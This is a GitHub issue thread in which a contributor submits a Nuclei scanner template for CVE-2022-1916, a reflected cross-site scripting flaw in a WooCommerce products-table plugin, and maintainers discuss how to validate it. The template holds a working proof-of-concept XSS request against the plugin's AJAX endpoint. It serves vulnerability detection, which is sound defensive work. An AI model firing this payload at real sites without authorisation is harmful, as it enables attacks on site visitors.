### ISSUE TITLE
Active Products Tables for WooCommerce < 1.0.5 - Reflected Cross-Site-Scripting

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4650]
```yaml
id: CVE-2022-1916

info:
  name: Active Products Tables for WooCommerce < 1.0.5 - Reflected Cross-Site-Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not sanitise and escape a parameter before outputting it back in the response of an AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/d16a0c3d-4318-4ecd-9e65-fc4165af8808
  tags: xss,wp,wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\u003cscript%3Ealert(document.domain)\u003c/script%3E%22}'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```

**Comment by princechaddha** [comment]
Hi @akincibor, Thank you for taking the time to create this issue and for contributing to this project 🍻

If possible can you please provide us with the -debug data as we tried setting up the vulnerable environment for this template but couldn't able to validate the template? Thanks

**Comment by daffainfo** [comment]
@princechaddha i think this template is OK, because the vulnerability doesn't need any authentication

**Comment by tess-ss** [comment]
Hi @daffainfo 

Thank you for taking the time to create this issue and for contributing to this project :)

Can you please guide me to download the WooCommerce < 1.0.5 plugin zip file I tried searching it here on https://downloads.wordpress.org/plugin/woocommerce.1.0.4.zip but it seems like the old plugin files are removed so I was not able to test the issue locally on my Wordpress Instance and verify the template. 

Thanks,
@tess-ss

**Comment by daffainfo** [comment]
> ```yaml
> https://wpscan.com/vulnerability/d16a0c3d-4318-4ecd-9e65-fc4165af8808
> ```

https://wordpress.org/plugins/profit-products-tables-for-woocommerce/advanced/

**Comment by tess-ss** [comment]
Hi @daffainfo 

Thank you for replying, can you please share the version < 1.0.5 plugin zip file cause when I visit https://wordpress.org/plugins/profit-products-tables-for-woocommerce/advanced/ the version available here is 1.0.6 and to test your template we need version < 1.0.5 

I tried searching https://downloads.wordpress.org/plugin/profit-products-tables-for-woocommerce.1.0.4.zip but it seems like it has been removed and only latest version is available to dowload.
